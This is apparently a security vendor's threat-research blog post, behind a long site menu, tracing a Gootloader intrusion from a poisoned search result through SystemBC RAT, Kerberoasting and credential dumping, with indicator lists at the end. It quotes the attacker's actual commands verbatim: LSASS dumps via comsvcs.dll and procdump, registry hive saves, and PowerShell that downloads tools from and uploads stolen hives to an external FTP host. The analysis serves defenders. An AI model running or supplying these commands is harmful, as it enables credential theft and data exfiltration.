WEBINAR | A Deep-Dive into 2023 Cyber Threats
Reduce Alert Noise and False Positives
Boost your team's productivity by cutting down alert noise and false positives.
Automate Security Operations
Boost efficiency, reduce burnout, and better manage risk through automation.
Dark Web Monitoring
Online protection tuned to the need of your business.
Maximize Existing Security Investments
Improve efficiencies from existing investments in security tools.
Beyond MDR
Move your security operations beyond the limitations of MDR.
Secure with Microsoft 365 E5
Boost the power of Microsoft 365 E5 security.
Secure Multi-Cloud Environments
Improve cloud security and overcome complexity across multi-cloud environments.
Secure Mergers and Acquisitions
Control cyber risk for business acquisitions and dispersed business units.
Operational Technology
Solve security operations challenges affecting critical operational technology (OT) infrastructure.
Force-Multiply Your Security Operations
Whether you’re just starting your security journey, need to up your game, or you’re not happy with an existing service, we can help you to achieve your security goals.
Detection Investigation Response
Modernize Detection, Investigation, Response with a Security Operations Platform.
Threat Hunting
Locate and eliminate lurking threats with ReliaQuest GreyMatter
Threat Intelligence
Find cyber threats that have evaded your defenses.
Model Index
Security metrics to manage and improve security operations.
Breach and Attack Simulation
GreyMatter Verify is ReliaQuest’s automated breach and attack simulation capability.
Digital Risk Protection
Continuous monitoring of open, deep, and dark web sources to identify threats.
Phishing Analyzer
GreyMatter Phishing Analyzer removes the abuse mailbox management by automating the DIR process for you.
Integration Partners
The GreyMatter cloud-native Open XDR platform integrates with a fast-growing number of market-leading technologies.
Unify and Optimize Your Security Operations
ReliaQuest GreyMatter is a security operations platform built on an open XDR architecture and designed to help security teams increase visibility, reduce complexity, and manage risk across their security tools, including on-premises, clouds, networks, and endpoints.
Blog
Company Blog
Case Studies
Brands of the world trust ReliaQuest to achieve their security goals.
Data Sheets
Learn how to achieve your security outcomes faster with ReliaQuest GreyMatter.
eBooks
The latest security trends and perspectives to help inform your security operations.
Industry Guides and Reports
The latest security research and industry reports.
Podcasts
Catch up on the latest cybersecurity podcasts, and mindset moments from our very own mental performance coaches.
Solution Briefs
A deep dive on how ReliaQuest GreyMatter addresses security challenges.
White Papers
The latest white papers focused on security operations strategy, technology & insight.
Videos
Current and future SOC trends presented by our security experts.
Events & Webinars
Explore all upcoming company events, in-person and on-demand webinars
ReliaQuest ResourceCenter
From prevention techniques to emerging security trends, our comprehensive library can arm you with the tools you need to improve your security posture.
Threat Research
Get the latest threat analysis from the ReliaQuest Threat Research Team. ReliaQuest ShadowTalk Weekly podcast featuring discussions on the latest cybersecurity news and threat research.
Shadow Talk
ReliaQuest's ShadowTalk is a weekly podcast featuring discussions on the latest cybersecurity news and threat research. ShadowTalk's hosts come from threat intelligence, threat hunting, security research, and leadership backgrounds providing practical perspectives on the week's top cybersecurity stories.
April 25, 2024
About ReliaQuest
We bring our best attitude, energy and effort to everything we do, every day, to make security possible.
Leadership
Security is a team sport.
No Show Dogs Podcast
Mental Performance Coaches Derin McMains and Dr. Nicole Detling interview world-class performers across multiple industries.
Make It Possible
Make It Possible reflects our focus on bringing cybersecurity awareness to our communities and enabling the next generation of cybersecurity professionals.
Careers
Join our world-class team.
Press and Media Coverage
ReliaQuest newsroom covering the latest press release and media coverage.
Become a Channel Partner
When you partner with ReliaQuest, you help deliver world-class cybersecurity solutions.
Contact Us
How can we help you?
A Mindset Like No Other in the Industry
Many companies tout their cultures; at ReliaQuest, we share a mindset. We focus on four values every day to make security possible: being accountable, helpful, adaptable, and focused. These values drive development of our platform, relationships with our customers and partners, and further the ReliaQuest promise of security confidence across our customers and our own teams.
More results...
How many times have we heard “It takes just one click”? Well, in this case it took approximately three. In May 2023, the ReliaQuest Threat Hunting Team responded to an incident involving credential access and exfiltration that was traced back to the JavaScript-based initial access malware “Gootloader.” Using endpoint and network telemetry, we were able to advise on containment of the threat prior to impact, which was crucial since Gootloader can be leveraged as an initial access vector for second-stage remote access tools with overall goal of deploying ransomware.
In this assessment, our team was able to identify that this particular strain of Gootloader leveraged a relatively new infection chain identified in 2022. In addition, our team identified evidence of the SystemBC RAT being leveraged as a second-stage payload to allow the attackers interactive remote access to the environment. Lastly, we discuss how the attacker leveraged this to access and exfiltrate credentials from the environment.
Before getting into the specific behavior we observed, let’s discuss Gootloader in terms of its known tactics, techniques, and procedures (TTPs). Gootloader is a JavaScript-based initial access malware strain, meaning this is what a threat actor will use to “initially access” the environment and enable the infiltration of remote access payloads in order to engage interactively with its target.
For delivery, it typically depends on SEO poisoning, a technique used by attackers to manipulate the ranking of web pages in search engine results to draw clicks and prompt malware downloads. Once downloaded by the user and executed, the malware typically establishes persistence via a scheduled task. It then begins command-and-control (C2) communication to relay system information and infiltrate a second-stage payload that will be used to achieve post-exploitation objectives. Overall, the most common second-stage payload with Gootloader observed as a precursor is Cobalt Strike.
Click 1: During the intrusion handled by the ReliaQuest Threat Hunting Team, the initially infected user had visited an infected site displaying the classic Gootloader forum template hosted at salamancaespectacular[.]com/what-is-the-difference-between-legal-ruled-and-wide-ruled-paper.
salamancaespectacular[.]com/what-is-the-difference-between-legal-ruled-and-wide-ruled-paper
Click 2: On this fake forum, a hyperlink prompted the user to download “the answer” to “what is the difference between legal ruled and wide ruled paper” (Figure 1):
Figure 1: Screenshot of a malicious webpage intended to host Gootloader
Considering social engineering techniques, it’s worth noting that Gootloader has recently been known to specifically target the healthcare and legal industries. It’s easy to imagine a law student or legal firm employee innocently tapping the same question into Google.
The HTML of this page (Figure 2) revealed the download hosting link that the user is redirected to. This ultimately results in a download of the ZIP file containing the malicious JS file onto the user’s local machine.
Figure 2: Malicious Gootloader webpage HTML source code with download link
After the user clicks on the file to execute it, the initial JS file executes via Windows Script Host (wscript.exe) using this command line:
“C:\Windows\System32\WScript.exe""C:\Users\ExampleUser\AppData\Local\Temp\ Temp1_What_is_the_difference_between_legal_ruled_and_wide_ruled_paper_7301 .zip\what is the difference between legal ruled and wide ruled paper 29094.js
“C:\Windows\System32\WScript.exe""C:\Users\ExampleUser\AppData\Local\Temp\
Temp1_What_is_the_difference_between_legal_ruled_and_wide_ruled_paper_7301
.zip\what is the difference between legal ruled and wide ruled paper 29094.js
Thus, the chain was started. We then observed the first Gootloader JS file dropping another JS file onto the host named lead-based paint.js within this file directory:
lead-based paint.js
C:\Users\ExampleUser\AppData\Roaming\Adobe
This seemed to attempt to masquerade as a legitimate Adobe process. This file was first dropped as Conceptual Design.log within this file directory:
Conceptual Design.log
After that, it was renamed to lead-based paint.js.
However, the same Gootloader sample that we observed executing in the wild—and kicking off the incident our team responded to—resulted in the file being placed into this directory:
C:\Users\ExampleUser\AppData\Roaming\AutoDesk
This observation was noteworthy because the initial JS payload seemed to change the directory in which it placed the second JS file per execution of the malware. This was likely a developer tactic to evade defenders who might notice patterns in the file’s placement.
After this point, the JS file was referred to using Windows short name: LEAD-B~1.JS, with its full filename no longer used in WScript executions. That file, with its short name, was the final Gootloader payload.
LEAD-B~1.JS
The initial JS script (what is the difference between legal ruled and wide ruled paper 29094.js) added the secondary script in its shortened form as a scheduled task on the victim’s machine with the name Tribal Consultation. The task name did not vary between executions of the Gootloader malware and was configured to run under the context of the initiating user upon logging in.
what is the difference between legal ruled and wide ruled paper 29094.js
Tribal Consultation
Figure 3: Scheduled task event
The execution of the Gootloader payload LEAD-B~1.JS via`wscript.exe launched an instance of cscript.exe, which ultimately launched an obfuscated PowerShell command reaching out to 10 C2 domains, which are also listed at the end of this assessment.
cscript.exe
Figure 4: LEAD-B~1.JS Command-and-Control Domains
Analysis of the commands indicated that the initial communication with these domains included information about the machine stored in environmental variables. These environmental variables were then sent to the observed domains within cookie headers.
Figure 5: LEAD-B~1.JS cookie header collection
The script indicated that information collected within these variables included the operating system, symbolic link file names, file folder names, filenames, and running processes. This information was then Base64 encoded, and Gzip compressed.
These domains were also used to infiltrate the second-stage payload into the machine to allow the attacker interactive remote access. Since Gootloader is commonly known to inject the second-stage payload within the registry, we analyzed the resulting registry modifications resulting from network connections to the previously mentioned domains. We assessed this payload to likely reside within HKU\ExampleUserSID\SOFTWARE\453694B5D3\17016 and HKU\ExampleUserSID\SOFTWARE\3144EAACD7\636.
HKU\ExampleUserSID\SOFTWARE\453694B5D3\17016
HKU\ExampleUserSID\SOFTWARE\3144EAACD7\636
As for identification of the second-stage payload, our team discovered, with a moderate level of confidence, that this was likely to be SystemBC RAT. This attribution was based on observed network telemetry to the destination IP 94[.]156[.]189[.]36 in reference to PowerShell executions from the registry key HKCU:\SOFTWARE\3144EAACD7\$pid. Additionally, the SHA-256 f2afd46cfef3883fc858ca7b7730d4d6ee56a7aedbdb1b1f7bda7dba054f489e associated with the file making these connections also strongly indicates this to be SystemBC RAT.
94[.]156[.]189[.]36
HKCU:\SOFTWARE\3144EAACD7\$pid
SHA-256 f2afd46cfef3883fc858ca7b7730d4d6ee56a7aedbdb1b1f7bda7dba054f489e
After remote access to the initially accessed victim account was established, the attacker began discovery actions in an attempt to escalate privileges. They used that account to query Lightweight Directory Access Protocol (LDAP) information via PowerShell, storing this information within environmental variables. This activity was evidenced by network connections over port 389 (LDAP) and corresponding PowerShell command sourcing from the compromised user.
Privilege escalation did not occur until 58 days after the initial compromise. This could have been for many reasons—including an attempt at stealth, acting as an initial access broker (IAB) by handing this portion of the compromise to an affiliate (which Gootloader infections are known for), or simply a delay in operations. Our team observed the initially compromised user querying Service Principal Names (SPNs) within the environment for service account discovery. SPNs are associated with a discoverable service and include an attached service account. Therefore, querying SPNs can allow an attacker to discover service accounts within the environment.
Shortly after the SPN requests, the initially compromised user requested a Kerberos ticket for a stale service account within the environment using RC4 encryption. This activity was evidenced by Windows Security event log ID 4768 (“A Kerberos service ticket was requested”) which indicated the encryption type to be 0x17 (RC4-HMAC). When requesting a Kerberos service ticket using an encryption type such as RC4, the returned ticket is encrypted with the accounts NTLM password hash. As this encryption method is outdated, it can easily be cracked by attackers offline.
In addition to the service account account our team was already aware of, similar Kerberoasting activity was observed against several users within the environment. The resulting information was most likely collected as a list, as part of exfiltrated data to the observed C2 domains. Following this, our team did not observe interactive access to this service account for three days.
Upon interactive access to the service account, our team observed this account gathering additional information regarding the environment in a similar fashion to the initially compromised user—by gathering information within environmental variables and exfiltrating it to C2 domains hxxps://demo.petsure.com/xmlrpc[.]php, hxxps://cacommerciallaw.com/xmlrpc[.]php, and hxxps://docs.vrent.techvill.net/xmlrpc[.]php.
hxxps://demo.petsure.com/xmlrpc[.]php
hxxps://cacommerciallaw.com/xmlrpc[.]php
hxxps://docs.vrent.techvill.net/xmlrpc[.]php
The method of lateral movement used was via the Remote Desktop Protocol (RDP) sourcing from the initially compromised host. Based on network telemetry, our team identified that the attacker used the compromised service account to RDP to three unique hosts within the environment within minutes of each other. Of these connections, interactive actions were only taken on one of the observed hosts: a Stealthbits Server. These mentioned RDP connections sourced from the user’s active PowerShell session on the source host.
Once remote access was established to the Stealthbits server, the attacker dumped LSASS credentials on the host. The contents of LSASS memory can include encrypted passwords, NT hashes, LM hashes, and Kerberos tickets of active users on the machine—making it a prime target for attackers. The attacker used the Minidump function of comsvcs.dll. The comsvcs.dll is a Windows native DLL whose Minidump function enables a user to output the memory contents of a specified process ID. By specifying the process ID of LSASS on the host, an attacker can output the contents to a dump file of their choice. In this case, the attacker did not pick an inconspicuous name for the output dump file. The file lsassdump.dmp was created via the following command:
comsvcs.dll
“C:\Windows\system32\rundll32.exe” C:\Windows\System32\comsvcs.dll MiniDump 980 C:\lsassdump.dmp full
Based on EDR telemetry, this activity appeared unsuccessful due to prevention controls. Following this, the compromised service account was then observed infiltrating “procdump.exe”, hosted externally via FTP at:
ftp://eu9[.]richhost[.]eu/procdump/procdump[.]exe
This was done via a PowerShell download:
[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8;[System.Console]::InputEncoding=[Text.UTF8Encoding]: :UTF8;$key="E41EDE8E76";function etc($b){$ab1= [tEXt.enCodInG]::unIcOde.gEtsTriNg([Convert]::fRoMBaSe64stRiNg($b)); try{ieX $ab1 -oUtv ou -erRoRv erw|out-null;}cAtCh{}$o1o=ouT-sTriNg -i $ou;if($erw){$o1o +=ouT-sTriNg -i $erw};[Convert]::tObAsE64stRiNg ([teXt.enCodInG]::unIcoDe.geTbyTeS($o1o))};$txn=New-Object System.Collections.ArrayList;$txn += , @("27467B160F","$client = New-Object System.Net.WebClient;$client.Credentials = New-Object System.Net.NetworkCredential("user356", "7Y8nvt[RpOigl");$client.DownloadFile ("ftp://eu9.richhost.eu/procdump/procdump.exe", "C:\procdump");");$txn | ForEach-Object {$txt=$_[0];$txe=etc($_[1]);"[$key|$txt]$txe[$txt|$key]"};
[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8;[System.Console]::InputEncoding=[Text.UTF8Encoding]:
:UTF8;$key="E41EDE8E76";function etc($b){$ab1=
[tEXt.enCodInG]::unIcOde.gEtsTriNg([Convert]::fRoMBaSe64stRiNg($b));
try{ieX $ab1 -oUtv ou -erRoRv erw|out-null;}cAtCh{}$o1o=ouT-sTriNg -i
$ou;if($erw){$o1o +=ouT-sTriNg -i $erw};[Convert]::tObAsE64stRiNg
([teXt.enCodInG]::unIcoDe.geTbyTeS($o1o))};$txn=New-Object
System.Collections.ArrayList;$txn += , @("27467B160F","$client =
New-Object System.Net.WebClient;$client.Credentials = New-Object
System.Net.NetworkCredential("user356", "7Y8nvt[RpOigl");$client.DownloadFile
("ftp://eu9.richhost.eu/procdump/procdump.exe", "C:\procdump");");$txn
| ForEach-Object {$txt=$_[0];$txe=etc($_[1]);"[$key|$txt]$txe[$txt|$key]"};
Procdump is a well-known Windows Sysinternals tool that can be used to generate crash dumps of a given process. Following the infiltration of this tool, the attacker was observed leveraging it on the host to create a dump file of LSASS memory:
procdump -accepteula -ma lsass.exe lsassdump
Following dumping LSASS via procdump, the compromised user was then observed saving the registry contents of the SYSTEM hive and the SAM hive via the registry modification toolreg.exe. The SYSTEM hive includes sensitive settings and configurations associated with the local machine, including software configurations, application properties, possible user account information, default port configurations, etc. Of particular importance is that this is the location of the SYSKEY, which may contain keys used to encrypt the SAM database. The command used by the attacker to save the SYSTEM hive can be seen below:
toolreg.exe
reg save hklm\system system
The SAM database contents include items like LSASS memory, such as usernames and their respective NTLM password hashes. The attacker may have chosen to dump both to ensure all credentials were captured. The command used to save the SAM hive can be seen below:
reg save hklm\sam
The attacker then began exfiltration of their captured data. Both hive exports were uploaded to the previously observed FTP hosting site, eu9[.]richhost[.]eu, via PowerShell:
eu9[.]richhost[.]eu
$client = New-Object System.Net.WebClient;$client.Credentials = New-Object System.Net.NetworkCredential("user356", "7Y8nvt[RpOigl");$client.UploadFile("ftp://eu9.richhost.eu/procdump/system", "C:\system");
$client = New-Object System.Net.WebClient;$client.Credentials = New-Object System.Net.NetworkCredential("user356",
"7Y8nvt[RpOigl");$client.UploadFile("ftp://eu9.richhost.eu/procdump/system", "C:\system");
$client = New-Object System.Net.WebClient;$client.Credentials = New-Object System.Net.NetworkCredential("user356", "7Y8nvt[RpOigl");$client.UploadFile("ftp://eu9.richhost.eu/procdump/sam", "C:\sam");
"7Y8nvt[RpOigl");$client.UploadFile("ftp://eu9.richhost.eu/procdump/sam", "C:\sam");
At this point, access to compromised accounts was cut and associated hosts were isolated. No additional events associated with the incident were noted by the ReliaQuest Threat Hunting Team.
Figure 6: Gootloader attack timeline
As we can see from this assessment, a simple Google search and an over-trusting mindset can lead to disastrous results for an organization. Luckily, the ReliaQuest Threat Hunting team was able to advise on containment of the threat prior to more severe actions taking place, such as lateral movement to a domain controller and/or the deployment of ransomware.
The following are general recommendations that can help prevent the same actions in any environment.
94[.]156[.]189[.]36 217[.]145[.]84[.]64 167[.]172[.]154[.]244 66[.]33[.]211[.]237 salamancaespectacular[.]com/what-is-the-difference-between-legal-ruled-and-wide-ruled-paper hxxps://emailbuilder[.]a6uat[.]co[.]uk/download[.]php hxxps://wildlife[.]org/xmlrpc[.]php hxxps://spinomenal[.]com/xmlrpc[.]php hxxps://airjust[.]de/xmlrpc[.]php hxxps://maharat-rt[.]com/xmlrpc[.]php hxxps://jocarsa[.]com/xmlrpc[.]php hxxp://ddman-vpn.ddns[.]net/wordpress/xmlrpc[.]php hxxps://gahar[.]ir/xmlrpc[.]php hxxps://anevaz[.]com[.]br/xmlrpc[.]php hxxps://pornmagazine[.]club/xmlrpc[.]php hxxps://phone[.]do/xmlrpc[.]php hxxps://demo[.]petsure[.]com/xmlrpc[.]php hxxps://docs[.]vrent[.]techvill[.]net/xmlrpc[.]php cacommerciallaw[.]com eu9[.]richhost[.]eu Lead-based Paint[.]js what is the difference between legal ruled and wide ruled paper 29094[.]js What_is_the_difference_between_legal_ruled_and_wide_ruled_paper_7301[.]zip c3a62fce18a62c8db3b43b5fa776f650fbfc91ecf66457f51a0149034fb53670 72ECFA3693CE5858332C9CEE21B608A8F0C2DC3462D56E8BC9955C550A09D55D
217[.]145[.]84[.]64
167[.]172[.]154[.]244
66[.]33[.]211[.]237
hxxps://emailbuilder[.]a6uat[.]co[.]uk/download[.]php
hxxps://wildlife[.]org/xmlrpc[.]php
hxxps://spinomenal[.]com/xmlrpc[.]php
hxxps://airjust[.]de/xmlrpc[.]php
hxxps://maharat-rt[.]com/xmlrpc[.]php
hxxps://jocarsa[.]com/xmlrpc[.]php
hxxp://ddman-vpn.ddns[.]net/wordpress/xmlrpc[.]php
hxxps://gahar[.]ir/xmlrpc[.]php
hxxps://anevaz[.]com[.]br/xmlrpc[.]php
hxxps://pornmagazine[.]club/xmlrpc[.]php
hxxps://phone[.]do/xmlrpc[.]php
hxxps://demo[.]petsure[.]com/xmlrpc[.]php
hxxps://docs[.]vrent[.]techvill[.]net/xmlrpc[.]php
cacommerciallaw[.]com
Lead-based Paint[.]js
what is the difference between legal ruled and wide ruled paper 29094[.]js
What_is_the_difference_between_legal_ruled_and_wide_ruled_paper_7301[.]zip
c3a62fce18a62c8db3b43b5fa776f650fbfc91ecf66457f51a0149034fb53670
72ECFA3693CE5858332C9CEE21B608A8F0C2DC3462D56E8BC9955C550A09D55D